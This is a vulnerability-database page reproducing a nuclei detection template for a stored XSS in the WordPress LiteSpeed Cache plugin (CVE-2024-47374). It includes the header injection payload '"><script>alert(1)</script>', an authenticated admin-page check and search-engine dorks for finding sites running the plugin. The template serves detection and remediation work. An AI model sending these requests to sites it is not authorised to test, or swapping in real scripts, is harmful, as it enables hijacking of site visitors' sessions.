Lucene search
K

LiteSpeed Cache <= 6.5.0.2 - Stored XSS

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

LiteSpeed Cache up to 6.5.0.2 has a stored cross site scripting vulnerability (CVE-2024-47374); update to latest version.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2024-47374
5 Oct 202400:00
attackerkb
Circl
CVE-2024-47374
4 Oct 202411:12
circl
CNNVD
WordPress plugin LiteSpeed Cache 跨站脚本漏洞
5 Oct 202400:00
cnnvd
CVE
CVE-2024-47374
5 Oct 202415:16
cve
Cvelist
CVE-2024-47374 WordPress LiteSpeed Cache plugin <= 6.5.0.2 - Cross Site Scripting (XSS) vulnerability
5 Oct 202415:16
cvelist
EUVD
EUVD-2024-42410
3 Oct 202520:07
euvd
NVD
CVE-2024-47374
5 Oct 202416:15
nvd
OpenVAS
WordPress LiteSpeed Cache Plugin < 6.5.1 XSS Vulnerability
7 Oct 202400:00
openvas
OSV
CVE-2024-47374
5 Oct 202416:15
osv
Patchstack
WordPress LiteSpeed Cache plugin <= 6.5.0.2 - Cross Site Scripting (XSS) vulnerability
30 Sep 202408:59
patchstack
Rows per page
id: CVE-2024-47374

info:
  name: LiteSpeed Cache <= 6.5.0.2 - Stored XSS
  author: Sourabh-Sahu
  severity: high
  description: |
    LiteSpeed Technologies LiteSpeed Cache versions up to 6.5.0.2 contain a stored cross-site scripting caused by improper input neutralization during web page generation, letting attackers execute malicious scripts in victim browsers, exploit requires storing malicious input.
  impact: |
    Attackers can execute malicious scripts in victim browsers, leading to session hijacking, defacement, or redirection.
  remediation: |
    Update to the latest version of LiteSpeed Cache.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/litespeed-cache/litespeed-cache-61-unauthenticated-stored-cross-site-scripting
    - https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-6-5-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-47374
    cwe-id: CWE-79
    epss-score: 0.0141
    epss-percentile: 0.6941
    cpe: cpe:2.3:a:litespeedtech:litespeed_cache:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 5
    fofa-query: body=/wp-content/plugins/litespeed-cache/
    google-query: inurl:"/wp-content/plugins/litespeed-cache/"
    shodan-query: http.html:"/wp-content/plugins/litespeed-cache/"
  tags: cve,cve2024,wordpress,wp-plugin,xss,stored,litespeed,authenticated,vkev

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  - raw:
      - |
        GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "compare_versions(version, '<= 6.5.0.2')"
          - "contains(body, 'LiteSpeed Cache')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-LSCACHE-VARY-VALUE: "><script>alert(1)</script>

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - "contains_all(header, 'X-Litespeed-Tag', '2d2_HTTP.200')"
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "loginform")
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=litespeed-page_optm HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(1)</script>","litespeed")
        condition: and
# digest: 4b0a004830460221008ee77a6b55cde30a9bb037706d6b105851f10493949e8feda903b1b57a8327fb022100bf4043643bd356a3572c7f78e6b174f9ded2635237a674755032c5caeb233c66:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.16.1 - 7.1
EPSS0.0141
SSVC
18